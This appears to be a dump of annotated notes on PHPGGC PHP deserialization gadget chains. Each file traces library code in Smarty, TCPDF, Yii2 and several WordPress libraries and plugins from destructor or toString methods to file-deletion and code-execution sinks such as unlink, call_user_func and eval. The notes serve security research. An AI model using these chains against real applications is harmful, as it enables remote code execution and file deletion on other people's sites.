 3 |     2. Smarty_Internal_CacheResource_File::releaseLock
 4 |     3. unlink
 5 | */
 6 | 
 7 | // libs/sysplugins/smarty_internal_template.php
 8 | class Smarty_Internal_Template extends Smarty_Internal_TemplateBase {
 9 |     public function __destruct() {
10 |         if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
11 |             $this->cached->handler->releaseLock($this->smarty, $this->cached); // [*] next
12 |         }
13 |     }
14 | }
15 | 
16 | // libs/sysplugins/smarty_internal_cacheresource_file.php
17 | class Smarty_Internal_CacheResource_File extends Smarty_CacheResource {
18 |     public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) {
19 |         $cached->is_locked = false;
20 |         @unlink($cached->lock_id); // [*] sink
21 |     }
22 | }
23 | 
24 | // ======== REF ======== 
25 | // libs/Smarty.class.php
26 | class Smarty extends Smarty_Internal_TemplateBase {
27 |     public $cache_locking;
28 | }
29 | 
30 | // libs/sysplugins/smarty_template_cached.php
31 | class Smarty_Template_Cached extends Smarty_Template_Resource_Base {
32 |     public $is_locked;
33 |     public $handler;
34 | }


--------------------------------------------------------------------------------
/PHPGGC/Smarty_SSRF1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. Smarty_Internal_Template::__destruct
 3 |     2. SoapClient::__call (There is a type confusion bug triggering RCE - Bug #69085)
 4 | */
 5 | 
 6 | // libs/sysplugins/smarty_internal_template.php
 7 | class Smarty_Internal_Template extends Smarty_Internal_TemplateBase {
 8 |     public function __destruct() {
 9 |         if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
10 |             $this->cached->handler->releaseLock($this->smarty, $this->cached); // [!] need to set $this->cached->handler to SoapClient
11 |         }
12 |     }
13 | }


--------------------------------------------------------------------------------
/PHPGGC/SwiftMailer_FD1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \Swift_ByteStream_TemporaryFileByteStream::__destruct
 3 |     2. unlink
 4 | */
 5 | 
 6 | // vendor/swiftmailer/swiftmailer/lib/classes/Swift/ByteStream/TemporaryFileByteStream.php
 7 | class Swift_ByteStream_TemporaryFileByteStream extends Swift_ByteStream_FileByteStream {
 8 |     public function __destruct() {
 9 |         if (file_exists($this->getPath())) {
10 |             @unlink($this->getPath()); // [*] sink
11 |         }
12 |     }
13 | }
14 | 


--------------------------------------------------------------------------------
/PHPGGC/TCPDF_FD1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. TCPDF::__destruct
 3 |     2. TCPDF::_destroy
 4 |     3. unlink
 5 | */
 6 | 
 7 | // tcpdf.php
 8 | class TCPDF {
 9 |     public function __destruct() {
10 |         // cleanup
11 |         $this->_destroy(true); // [*] next
12 |     }
13 |     
14 |     public function _destroy($destroyall=false, $preserve_objcopy=false) {
15 |         // restore internal encoding
16 |         if (isset($this->internal_encoding) AND !empty($this->internal_encoding)) {
17 |             mb_internal_encoding($this->internal_encoding);
18 |         }
19 |         if (isset(self::$cleaned_ids[$this->file_id])) {
20 |             $destroyall = false;
21 |         }
22 |         if ($destroyall AND !$preserve_objcopy) {
23 |             self::$cleaned_ids[$this->file_id] = true;
24 |             // remove all temporary files
25 |             if ($handle = opendir(K_PATH_CACHE)) {
26 |                 while ( false !== ( $file_name = readdir( $handle ) ) ) {
27 |                     if (strpos($file_name, '__tcpdf_'.$this->file_id.'_') === 0) {
28 |                         unlink(K_PATH_CACHE.$file_name); // [*] sink
29 |                     }
30 |                 }
31 |                 closedir($handle);
32 |             }
33 |             if (isset($this->imagekeys)) {
34 |                 foreach($this->imagekeys as $file) {
35 |                     unlink($file); // [*] sink
36 |                 }
37 |             }
38 |         }
39 |         ...
40 |     }
41 | }


--------------------------------------------------------------------------------
/PHPGGC/WordPress_Dompdf_RCE1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \Dompdf\Adapter\CPDF::__destruct // foreach
 3 |     2. Requests_Utility_FilteredIterator::current
 4 |     3. call_user_func
 5 | */
 6 | 
 7 | // wp-content/themes/twentytwenty/dompdf/vendor/dompdf/dompdf/src/Adapter/CPDF.php
 8 | namespace Dompdf\Adapter;
 9 | class CPDF implements Canvas {
10 |     public function __destruct() {
11 |         foreach ($this->_image_cache as $img) { // [*] next (call current)
12 |             // The file might be already deleted by 3rd party tmp cleaner,
13 |             // the file might not have been created at all
14 |             // (if image outputting commands failed)
15 |             // or because the destructor was called twice accidentally.
16 |             if (!file_exists($img)) {
17 |                 continue;
18 |             }
19 | 
20 |             if ($this->_dompdf->getOptions()->getDebugPng()) {
21 |                 print '[__destruct unlink ' . $img . ']';
22 |             }
23 |             if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) {
24 |                 unlink($img);
25 |             }
26 |         }
27 |     }
28 | }
29 | 
30 | // wp-includes/Requests/Utility/FilteredIterator.php
31 | class Requests_Utility_FilteredIterator extends ArrayIterator {
32 |     public function current() {
33 |         $value = parent::current();
34 |         $value = call_user_func($this->callback, $value); // [*] sink
35 |         return $value;
36 |     }
37 | }


--------------------------------------------------------------------------------
/PHPGGC/WordPress_Dompdf_RCE2.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \Dompdf\Adapter\CPDF::__destruct // foreach
 3 |     2. Requests_Utility_FilteredIterator::current
 4 |     3. call_user_func
 5 | */
 6 | 
 7 | // wp-content/themes/twentytwenty/dompdf/vendor/dompdf/dompdf/src/Adapter/CPDF.php
 8 | namespace Dompdf\Adapter;
 9 | class CPDF implements Canvas {
10 |     public function __destruct() {
11 |         foreach ($this->_image_cache as $img) { // [*] next (call current)
12 |             // The file might be already deleted by 3rd party tmp cleaner,
13 |             // the file might not have been created at all
14 |             // (if image outputting commands failed)
15 |             // or because the destructor was called twice accidentally.
16 |             if (!file_exists($img)) {
17 |                 continue;
18 |             }
19 | 
20 |             if ($this->_dompdf->getOptions()->getDebugPng()) print '[__destruct unlink ' . $img . ']';
21 |             if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) unlink($img);
22 |         }
23 |     }
24 | }
25 | 
26 | // wp-includes/Requests/Utility/FilteredIterator.php
27 | class Requests_Utility_FilteredIterator extends ArrayIterator {
28 |     public function current() {
29 |         $value = parent::current();
30 |         $value = call_user_func($this->callback, $value); // [*] sink
31 |         return $value;
32 |     }
33 | }


--------------------------------------------------------------------------------
/PHPGGC/WordPress_Guzzle_RCE1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \GuzzleHttp\Cookie\SetCookie::__toString // foreach
 3 |     2. Requests_Utility_FilteredIterator::current
 4 |     3. call_user_func
 5 | */
 6 | 
 7 | // wp-content/themes/twentytwenty/Guzzle-6.0.0/vendor/guzzlehttp/guzzle/src/Cookie/SetCookie.php
 8 | namespace GuzzleHttp\Cookie;
 9 | class SetCookie {
10 |     public function __toString() {
11 |         $str = $this->data['Name'] . '=' . $this->data['Value'] . '; ';
12 |         foreach ($this->data as $k => $v) { // [*] next (call current)
13 |             if ($k != 'Name' && $k != 'Value' && $v !== null && $v !== false) {
14 |                 if ($k == 'Expires') {
15 |                     $str .= 'Expires=' . gmdate('D, d M Y H:i:s \G\M\T', $v) . '; ';
16 |                 } else {
17 |                     $str .= ($v === true ? $k : "{$k}={$v}") . '; ';
18 |                 }
19 |             }
20 |         }
21 | 
22 |         return rtrim($str, '; ');
23 |     }
24 | }
25 | 
26 | // wp-includes/Requests/Utility/FilteredIterator.php
27 | class Requests_Utility_FilteredIterator extends ArrayIterator {
28 |     public function current() {
29 |         $value = parent::current();
30 |         $value = call_user_func($this->callback, $value); // [*] sink
31 |         return $value;
32 |     }
33 | }


--------------------------------------------------------------------------------
/PHPGGC/WordPress_Guzzle_RCE2.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \GuzzleHttp\Cookie\FileCookieJar::__destruct
 3 |     2. \GuzzleHttp\Cookie\FileCookieJar::save // file_put_contents
 4 |     3. \GuzzleHttp\Cookie\SetCookie::__toString // foreach
 5 |     4. Requests_Utility_FilteredIterator::current
 6 |     5. call_user_func
 7 | */
 8 | 
 9 | // wp-content/themes/twentytwenty/Guzzle-6.0.0/vendor/guzzlehttp/guzzle/src/Cookie/FileCookieJar.php
10 | namespace GuzzleHttp\Cookie;
11 | class FileCookieJar extends CookieJar {
12 |     public function __destruct() {
13 |         $this->save($this->filename); // [*] next
14 |     }
15 |     
16 |     public function save($filename) {
17 |         $json = [];
18 |         foreach ($this as $cookie) {
19 |             /** @var SetCookie $cookie */
20 |             if ($cookie->getExpires() && !$cookie->getDiscard()) {
21 |                 $json[] = $cookie->toArray();
22 |             }
23 |         }
24 | 
25 |         if (false === file_put_contents($filename, json_encode($json))) { // [*] next (call __toString)
26 |             throw new \RuntimeException("Unable to save file {$filename}");
27 |         }
28 |     }
29 | }
30 | 
31 | // wp-content/themes/twentytwenty/Guzzle-6.0.0/vendor/guzzlehttp/guzzle/src/Cookie/SetCookie.php
32 | namespace GuzzleHttp\Cookie;
33 | class SetCookie {
34 |     public function __toString() {
35 |         $str = $this->data['Name'] . '=' . $this->data['Value'] . '; ';
36 |         foreach ($this->data as $k => $v) { // [*] next (call current)
37 |             if ($k != 'Name' && $k != 'Value' && $v !== null && $v !== false) {
38 |                 if ($k == 'Expires') {
39 |                     $str .= 'Expires=' . gmdate('D, d M Y H:i:s \G\M\T', $v) . '; ';
40 |                 } else {
41 |                     $str .= ($v === true ? $k : "{$k}={$v}") . '; ';
42 |                 }
43 |             }
44 |         }
45 | 
46 |         return rtrim($str, '; ');
47 |     }
48 | }
49 | 
50 | // wp-includes/Requests/Utility/FilteredIterator.php
51 | class Requests_Utility_FilteredIterator extends ArrayIterator {
52 |         public function current() {
53 |             $value = parent::current();
54 |             $value = call_user_func($this->callback, $value); // [*] sink
55 |             return $value;
56 |         }
57 | }


--------------------------------------------------------------------------------
/PHPGGC/WordPress_PHPExcel_RCE1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. PHPExcel_RichText::__toString
 3 |     2. PHPExcel_RichText::getPlainText // foreach
 4 |     3. Requests_Utility_FilteredIterator::current
 5 |     4. call_user_func
 6 | */
 7 | 
 8 | // wp-content/themes/twentytwenty/PHPExcel-1.8.2/Classes/PHPExcel/RichText.php
 9 | class PHPExcel_RichText implements PHPExcel_IComparable {
10 |     public function __toString() {
11 |         return $this->getPlainText(); // [*] next
12 |     }
13 |     
14 |     public function getPlainText() {
15 |         // Return value
16 |         $returnValue = '';
17 | 
18 |         // Loop through all PHPExcel_RichText_ITextElement
19 |         foreach ($this->richTextElements as $text) { // [*] next (call current)
20 |             $returnValue .= $text->getText();
21 |         }
22 | 
23 |         // Return
24 |         return $returnValue;
25 |     }
26 | }
27 | 
28 | // wp-includes/Requests/Utility/FilteredIterator.php
29 | class Requests_Utility_FilteredIterator extends ArrayIterator {
30 |     public function current() {
31 |         $value = parent::current();
32 |         $value = call_user_func($this->callback, $value); // [*] sink
33 |         return $value;
34 |     }
35 | }
36 | 


--------------------------------------------------------------------------------
/PHPGGC/WordPress_PHPExcel_RCE2.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. PHPExcel_RichText::__toString
 3 |     2. PHPExcel_RichText::getPlainText // foreach
 4 |     3. Requests_Utility_FilteredIterator::current
 5 |     4. call_user_func
 6 | */
 7 | 
 8 | // wp-content/themes/twentytwenty/PHPExcel-1.8.1/Classes/PHPExcel/RichText.php
 9 | class PHPExcel_RichText implements PHPExcel_IComparable {
10 |     public function __toString() {
11 |         return $this->getPlainText(); // [*] next
12 |     }
13 |     
14 |     public function getPlainText() {
15 |         // Return value
16 |         $returnValue = '';
17 | 
18 |         // Loop through all PHPExcel_RichText_ITextElement
19 |         foreach ($this->_richTextElements as $text) { // [*] next (call current)
20 |             $returnValue .= $text->getText();
21 |         }
22 | 
23 |         // Return
24 |         return $returnValue;
25 |     }
26 | }
27 | 
28 | // wp-includes/Requests/Utility/FilteredIterator.php
29 | class Requests_Utility_FilteredIterator extends ArrayIterator {
30 |     public function current() {
31 |         $value = parent::current();
32 |         $value = call_user_func($this->callback, $value); // [*] sink
33 |         return $value;
34 |     }
35 | }


--------------------------------------------------------------------------------
/PHPGGC/WordPress_PHPExcel_RCE3.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. PHPExcel_CachedObjectStorage_DiscISAM::__destruct // unlink
 3 |     2. PHPExcel_RichText::__toString
 4 |     3. PHPExcel_RichText::getPlainText // foreach
 5 |     4. Requests_Utility_FilteredIterator::current
 6 |     5. call_user_func
 7 | */
 8 | 
 9 | // wp-content/themes/twentytwenty/PHPExcel-1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
10 | class PHPExcel_CachedObjectStorage_DiscISAM extends PHPExcel_CachedObjectStorage_CacheBase implements PHPExcel_CachedObjectStorage_ICache {
11 |     public function __destruct() {
12 |         if (!is_null($this->fileHandle)) {
13 |             fclose($this->fileHandle);
14 |             unlink($this->fileName); // [*] next (call __toString)
15 |         }
16 |         $this->fileHandle = null;
17 |     }
18 | }
19 | 
20 | // wp-content/themes/twentytwenty/PHPExcel-1.8.2/Classes/PHPExcel/RichText.php
21 | class PHPExcel_RichText implements PHPExcel_IComparable {
22 |     public function __toString() {
23 |         return $this->getPlainText(); // [*] next
24 |     }
25 |     
26 |     public function getPlainText() {
27 |         // Return value
28 |         $returnValue = '';
29 | 
30 |         // Loop through all PHPExcel_RichText_ITextElement
31 |         foreach ($this->richTextElements as $text) { // [*] next (call current)
32 |             $returnValue .= $text->getText();
33 |         }
34 | 
35 |         // Return
36 |         return $returnValue;
37 |     }
38 | }
39 | 
40 | // wp-includes/Requests/Utility/FilteredIterator.php
41 | class Requests_Utility_FilteredIterator extends ArrayIterator {
42 |     public function current() {
43 |         $value = parent::current();
44 |         $value = call_user_func($this->callback, $value); // [*] sink
45 |         return $value;
46 |     }
47 | }


--------------------------------------------------------------------------------
/PHPGGC/WordPress_PHPExcel_RCE4.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. PHPExcel_CachedObjectStorage_DiscISAM::__destruct // unlink
 3 |     2. PHPExcel_RichText::__toString
 4 |     3. PHPExcel_RichText::getPlainText // foreach
 5 |     4. Requests_Utility_FilteredIterator::current
 6 |     5. call_user_func
 7 | */
 8 | 
 9 | // wp-content/themes/twentytwenty/PHPExcel-1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
10 | class PHPExcel_CachedObjectStorage_DiscISAM extends PHPExcel_CachedObjectStorage_CacheBase implements PHPExcel_CachedObjectStorage_ICache {
11 |      public function __destruct() {
12 |         if (!is_null($this->_fileHandle)) {
13 |             fclose($this->_fileHandle);
14 |             unlink($this->_fileName); // [*] next (call __toString)
15 |         }
16 |         $this->_fileHandle = null;
17 |     }
18 | }
19 | 
20 | // wp-content/themes/twentytwenty/PHPExcel-1.8.1/Classes/PHPExcel/RichText.php
21 | class PHPExcel_RichText implements PHPExcel_IComparable {
22 |     public function __toString() {
23 |         return $this->getPlainText(); // [*] next
24 |     }
25 |     
26 |     public function getPlainText() {
27 |         // Return value
28 |         $returnValue = '';
29 | 
30 |         // Loop through all PHPExcel_RichText_ITextElement
31 |         foreach ($this->_richTextElements as $text) { // [*] next (call current)
32 |             $returnValue .= $text->getText();
33 |         }
34 | 
35 |         // Return
36 |         return $returnValue;
37 |     }
38 | }
39 | 
40 | // wp-includes/Requests/Utility/FilteredIterator.php
41 | class Requests_Utility_FilteredIterator extends ArrayIterator {
42 |     public function current() {
43 |         $value = parent::current();
44 |         $value = call_user_func($this->callback, $value); // [*] sink
45 |         return $value;
46 |     }
47 | }


--------------------------------------------------------------------------------
/PHPGGC/WordPress_PHPExcel_RCE5.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. PHPExcel_Shared_XMLWriter::__destruct // unlink
 3 |     2. PHPExcel_RichText::__toString
 4 |     3. PHPExcel_RichText::getPlainText // foreach
 5 |     4. Requests_Utility_FilteredIterator::current
 6 |     5. call_user_func
 7 | */
 8 | 
 9 | // wp-content/themes/twentytwenty/PHPExcel-1.8.2/Classes/PHPExcel/Shared/XMLWriter.php
10 | class PHPExcel_Shared_XMLWriter extends XMLWriter {
11 |     public function __destruct() {
12 |         // Unlink temporary files
13 |         if ($this->tempFileName != '') {
14 |             @unlink($this->tempFileName); // [*] next (call __toString)
15 |         }
16 |     }
17 | }
18 | 
19 | // wp-content/themes/twentytwenty/PHPExcel-1.8.2/Classes/PHPExcel/RichText.php
20 | class PHPExcel_RichText implements PHPExcel_IComparable {
21 |     public function __toString() {
22 |         return $this->getPlainText(); // [*] next
23 |     }
24 |     
25 |     public function getPlainText() {
26 |         // Return value
27 |         $returnValue = '';
28 | 
29 |         // Loop through all PHPExcel_RichText_ITextElement
30 |         foreach ($this->richTextElements as $text) { // [*] next (call current)
31 |             $returnValue .= $text->getText();
32 |         }
33 | 
34 |         // Return
35 |         return $returnValue;
36 |     }
37 | }
38 | 
39 | // wp-includes/Requests/Utility/FilteredIterator.php
40 | class Requests_Utility_FilteredIterator extends ArrayIterator {
41 |     public function current() {
42 |         $value = parent::current();
43 |         $value = call_user_func($this->callback, $value); // [*] sink
44 |         return $value;
45 |     }
46 | }
47 | 


--------------------------------------------------------------------------------
/PHPGGC/WordPress_PHPExcel_RCE6.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. PHPExcel_Shared_XMLWriter::__destruct // unlink
 3 |     2. PHPExcel_RichText::__toString
 4 |     3. PHPExcel_RichText::getPlainText
 5 |     4. Requests_Utility_FilteredIterator::current
 6 |     5. call_user_func
 7 | 
 8 | */
 9 | 
10 | // wp-content/themes/twentytwenty/PHPExcel-1.8.1/Classes/PHPExcel/Shared/XMLWriter.php
11 | class PHPExcel_Shared_XMLWriter extends XMLWriter {
12 |     public function __destruct() {
13 |         // Unlink temporary files
14 |         if ($this->_tempFileName != '') {
15 |             @unlink($this->_tempFileName); // [*] next (call __toString)
16 |         }
17 |     }
18 | }
19 | 
20 | // wp-content/themes/twentytwenty/PHPExcel-1.8.1/Classes/PHPExcel/RichText.php
21 | class PHPExcel_RichText implements PHPExcel_IComparable {
22 |     public function __toString() {
23 |         return $this->getPlainText(); // [*] next
24 |     }
25 |     
26 |     public function getPlainText() {
27 |         // Return value
28 |         $returnValue = '';
29 | 
30 |         // Loop through all PHPExcel_RichText_ITextElement
31 |         foreach ($this->_richTextElements as $text) { // [*] next (call current)
32 |             $returnValue .= $text->getText();
33 |         }
34 | 
35 |         // Return
36 |         return $returnValue;
37 |     }
38 | }
39 | 
40 | // wp-includes/Requests/Utility/FilteredIterator.php
41 | class Requests_Utility_FilteredIterator extends ArrayIterator {
42 |     public function current() {
43 |         $value = parent::current();
44 |         $value = call_user_func($this->callback, $value); // [*] sink
45 |         return $value;
46 |     }
47 | }
48 | 


--------------------------------------------------------------------------------
/PHPGGC/WordPress_P_EmailSubscribers_RCE1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. IG_Log_Handler_File::__destruct // foreach
 3 |     2. Requests_Utility_FilteredIterator::current
 4 |     3. call_user_func
 5 | */
 6 | 
 7 | // wp-content/plugins/email-subscribers/lite/includes/logs/log-handlers/class-ig-log-handler-file.php
 8 | class IG_Log_Handler_File extends IG_Log_Handler {
 9 |     public function __destruct() {
10 |         foreach ( $this->handles as $handle ) { // [*] next (call current)
11 |             if ( is_resource( $handle ) ) {
12 |                 fclose( $handle ); // @codingStandardsIgnoreLine.
13 |             }
14 |         }
15 |     }
16 | }
17 | 
18 | // wp-includes/Requests/Utility/FilteredIterator.php
19 | class Requests_Utility_FilteredIterator extends ArrayIterator {
20 |     public function current() {
21 |         $value = parent::current();
22 |         $value = call_user_func($this->callback, $value); // [*] sink
23 |         return $value;
24 |     }
25 | }


--------------------------------------------------------------------------------
/PHPGGC/WordPress_P_EverestForms_RCE1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. EVF_Log_Handler_File::__destruct // foreach
 3 |     2. Requests_Utility_FilteredIterator::current
 4 |     3. call_user_func
 5 | */
 6 | 
 7 | // wp-content/plugins/everest-forms-1.6.6/includes/log-handlers/class-evf-log-handler-file.php
 8 | class EVF_Log_Handler_File extends EVF_Log_Handler {
 9 |     public function __destruct() {
10 |         foreach ( $this->handles as $handle ) { // [*] next (call current)
11 |             if ( is_resource( $handle ) ) {
12 |                 fclose( $handle ); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_read_fclose
13 |             }
14 |         }
15 |     }
16 | }
17 | 
18 | // wp-includes/Requests/Utility/FilteredIterator.php
19 | class Requests_Utility_FilteredIterator extends ArrayIterator {
20 |     public function current() {
21 |         $value = parent::current();
22 |         $value = call_user_func($this->callback, $value); // [*] sink
23 |         return $value;
24 |     }
25 | }


--------------------------------------------------------------------------------
/PHPGGC/WordPress_P_WooCommerce_RCE1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. WC_Log_Handler_File::__destruct // foreach
 3 |     2. Requests_Utility_FilteredIterator::current
 4 |     3. call_user_func
 5 | */
 6 | 
 7 | // wp-content/plugins/woocommerce-3.4.0/includes/log-handlers/class-wc-log-handler-file.php
 8 | class WC_Log_Handler_File extends WC_Log_Handler {
 9 |     public function __destruct() {
10 |         foreach ( $this->handles as $handle ) { // [*] next (call current)
11 |             if ( is_resource( $handle ) ) {
12 |                 fclose( $handle ); // @codingStandardsIgnoreLine.
13 |             }
14 |         }
15 |     }
16 | }
17 | 
18 | // wp-includes/Requests/Utility/FilteredIterator.php
19 | class Requests_Utility_FilteredIterator extends ArrayIterator {
20 |     public function current() {
21 |         $value = parent::current();
22 |         $value = call_user_func($this->callback, $value); // [*] sink
23 |         return $value;
24 |     }
25 | }


--------------------------------------------------------------------------------
/PHPGGC/WordPress_P_WooCommerce_RCE2.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. WC_Logger::__destruct // foreach
 3 |     2. Requests_Utility_FilteredIterator::current
 4 |     3. call_user_func
 5 | */
 6 | 
 7 | // wp-content/plugins/woocommerce-2.6.0/includes/class-wc-logger.php
 8 | class WC_Logger {
 9 |     public function __destruct() {
10 |         foreach ( $this->_handles as $handle ) { // [*] next (call current)
11 |             if ( is_resource( $handle ) ) {
12 |                 fclose( $handle );
13 |             }
14 |         }
15 |     }
16 | }
17 | 
18 | // wp-includes/Requests/Utility/FilteredIterator.php
19 | class Requests_Utility_FilteredIterator extends ArrayIterator {
20 |     public function current() {
21 |         $value = parent::current();
22 |         $value = call_user_func($this->callback, $value); // [*] sink
23 |         return $value;
24 |     }
25 | }


--------------------------------------------------------------------------------
/PHPGGC/WordPress_P_YetAnotherStarsRating_RCE1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     // Payload has to be in the COOKIE yasr_visitor_vote_cookie in a page containing the shortcode of the plugin allowing visitor ratings
 3 |     1. shortcode_visitor_votes_callback // foreach
 4 |     2. Requests_Utility_FilteredIterator::current
 5 |     3. call_user_func
 6 | */
 7 | 
 8 | // wp-content/plugins/yet-another-stars-rating/lib/yasr-shortcode-functions.php
 9 | function shortcode_visitor_votes_callback ($atts) {
10 |     // ...
11 |     if (isset($_COOKIE[$yasr_cookiename])) {
12 | 
13 |         $cookie_data = stripslashes($_COOKIE[$yasr_cookiename]);
14 |         $cookie_data = unserialize($cookie_data);
15 | 
16 |         foreach ($cookie_data as $value) { // [*] next (call current)
17 |         // ...
18 | }
19 | 
20 | // wp-includes/Requests/Utility/FilteredIterator.php
21 | class Requests_Utility_FilteredIterator extends ArrayIterator {
22 |     public function current() {
23 |         $value = parent::current();
24 |         $value = call_user_func($this->callback, $value); // [*] sink
25 |         return $value;
26 |     }
27 | }


--------------------------------------------------------------------------------
/PHPGGC/Yii2_RCE1.php:
--------------------------------------------------------------------------------
  1 | /*
  2 |     1. \yii\db\BatchQueryResult::__destruct
  3 |     2. \yii\db\BatchQueryResult::reset
  4 |     3. \yii\db\Connection::close // '' . $this->dsn
  5 |     4. \yii\db\ColumnSchemaBuilder::__toString
  6 |     5. \yii\db\ColumnSchemaBuilder::getTypeCategory // $this->categoryMap[$this->type]
  7 |     6. \yii\caching\ArrayCache(\yii\caching\Cache)::offsetGet
  8 |     7. \yii\caching\ArrayCache(\yii\caching\Cache)::get
  9 |     8. call_user_func
 10 | */
 11 | 
 12 | // vendor/yiisoft/yii2/db/BatchQueryResult.php
 13 | namespace yii\db;
 14 | class BatchQueryResult extends BaseObject implements \Iterator {
 15 |     public function __destruct() {
 16 |         // make sure cursor is closed
 17 |         $this->reset(); // [*] next
 18 |     }
 19 | 
 20 |     public function reset() {
 21 |         if ($this->_dataReader !== null) {
 22 |             $this->_dataReader->close(); // [*] next
 23 |         }
 24 |         $this->_dataReader = null;
 25 |         $this->_batch = null;
 26 |         $this->_value = null;
 27 |         $this->_key = null;
 28 |     }
 29 | }
 30 | 
 31 | // vendor/yiisoft/yii2/db/Connection.php
 32 | namespace yii\db;
 33 | class Connection extends Component {
 34 |     public function close() {
 35 |         if ($this->_master) {
 36 |             if ($this->pdo === $this->_master->pdo) {
 37 |                 $this->pdo = null;
 38 |             }
 39 | 
 40 |             $this->_master->close();
 41 |             $this->_master = false;
 42 |         }
 43 | 
 44 |         if ($this->pdo !== null) {
 45 |             Yii::debug('Closing DB connection: ' . $this->dsn, __METHOD__); // [*] next (call __toString)
 46 |             $this->pdo = null;
 47 |         }
 48 | 
 49 |         ...
 50 |     }
 51 | }
 52 | 
 53 | // vendor/yiisoft/yii2/db/ColumnSchemaBuilder.php
 54 | namespace yii\db;
 55 | class ColumnSchemaBuilder extends BaseObject {
 56 |     public function __toString() {
 57 |         switch ($this->getTypeCategory()) { // [*] next
 58 |             case self::CATEGORY_PK:
 59 |                 $format = '{type}{check}{comment}{append}';
 60 |                 break;
 61 |             default:
 62 |                 $format = '{type}{length}{notnull}{unique}{default}{check}{comment}{append}';
 63 |         }
 64 | 
 65 |         return $this->buildCompleteString($format);
 66 |     }
 67 |     
 68 |     protected function getTypeCategory() {
 69 |         return isset($this->categoryMap[$this->type]) ? $this->categoryMap[$this->type] : null; // [*] next
 70 |     }
 71 | }
 72 | 
 73 | // vendor/yiisoft/yii2/caching/ArrayCache.php
 74 | namespace yii\caching;
 75 | class ArrayCache extends Cache {
 76 | }
 77 | 
 78 | // vendor/yiisoft/yii2/caching/Cache.php
 79 | namespace yii\caching;
 80 | abstract class Cache extends Component implements CacheInterface {
 81 |     public function offsetGet($key) {
 82 |         return $this->get($key);
 83 |     }
 84 |     
 85 |     public function get($key) {
 86 |         $key = $this->buildKey($key);
 87 |         $value = $this->getValue($key);
 88 |         if ($value === false || $this->serializer === false) {
 89 |             return $value;
 90 |         } elseif ($this->serializer === null) {
 91 |             $value = unserialize($value);
 92 |         } else {
 93 |             $value = call_user_func($this->serializer[1], $value); // [*] sink
 94 |         }
 95 |         if (is_array($value) && !($value[1] instanceof Dependency && $value[1]->isChanged($this))) {
 96 |             return $value[0];
 97 |         }
 98 | 
 99 |         return false;
100 |     }
101 | }
102 | 
103 | // vendor/yiisoft/yii2/caching/CacheInterface.php
104 | namespace yii\caching; 
105 | interface CacheInterface extends \ArrayAccess {}


--------------------------------------------------------------------------------
/PHPGGC/Yii2_RCE2.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \yii\db\BatchQueryResult::__destruct
 3 |     2. \yii\db\BatchQueryResult::reset
 4 |     3. \yii\web\DbSession::close
 5 |     4. \yii\web\DbSession(\yii\web\MultiFieldSession)::composeFields // call_user_func
 6 |     5. \yii\caching\ExpressionDependency::evaluateDependency
 7 |     6. eval
 8 | */
 9 | 
10 | // vendor/yiisoft/yii2/db/BatchQueryResult.php
11 | namespace yii\db;
12 | class BatchQueryResult extends BaseObject implements \Iterator {
13 |     public function __destruct() {
14 |         // make sure cursor is closed
15 |         $this->reset(); // [*] next
16 |     }
17 |     
18 |     public function reset() {
19 |         if ($this->_dataReader !== null) {
20 |             $this->_dataReader->close(); // [*] next
21 |         }
22 |         $this->_dataReader = null;
23 |         $this->_batch = null;
24 |         $this->_value = null;
25 |         $this->_key = null;
26 |     }
27 | }
28 | 
29 | // vendor/yiisoft/yii2/web/DbSession.php
30 | namespace yii\web;
31 | class DbSession extends MultiFieldSession {
32 |     public function close() {
33 |         if ($this->getIsActive()) {
34 |             // prepare writeCallback fields before session closes
35 |             $this->fields = $this->composeFields(); // [*] next
36 |             YII_DEBUG ? session_write_close() : @session_write_close();
37 |         }
38 |     }
39 | }
40 | 
41 | // vendor/yiisoft/yii2/web/MultiFieldSession.php
42 | namespace yii\web;
43 | abstract class MultiFieldSession extends Session {
44 |     protected function composeFields($id = null, $data = null) {
45 |         $fields = $this->writeCallback ? call_user_func($this->writeCallback, $this) : []; // [*] next
46 |                                                                                            // [!] need to set $this->writeCallback to call \yii\caching\ExpressionDependency::evaluateDependency
47 |         if ($id !== null) {
48 |             $fields['id'] = $id;
49 |         }
50 |         if ($data !== null) {
51 |             $fields['data'] = $data;
52 |         }
53 |         return $fields;
54 |     }
55 | }
56 | 
57 | // vendor/yiisoft/yii2/caching/Dependency.php
58 | namespace yii\caching;
59 | abstract class Dependency extends \yii\base\BaseObject {
60 |     public function evaluateDependency($cache) {
61 |         if ($this->reusable) {
62 |             $hash = $this->generateReusableHash();
63 |             if (!array_key_exists($hash, self::$_reusableData)) {
64 |                 self::$_reusableData[$hash] = $this->generateDependencyData($cache);
65 |             }
66 |             $this->data = self::$_reusableData[$hash];
67 |         } else {
68 |             $this->data = $this->generateDependencyData($cache); // [*] next
69 |         }
70 |     }
71 | }
72 | 
73 | // vendor/yiisoft/yii2/caching/ExpressionDependency.php
74 | namespace yii\caching;
75 | class ExpressionDependency extends Dependency {
76 |     protected function generateDependencyData($cache) {
77 |         return eval("return {$this->expression};"); // [*] sink
78 |     }
79 | }


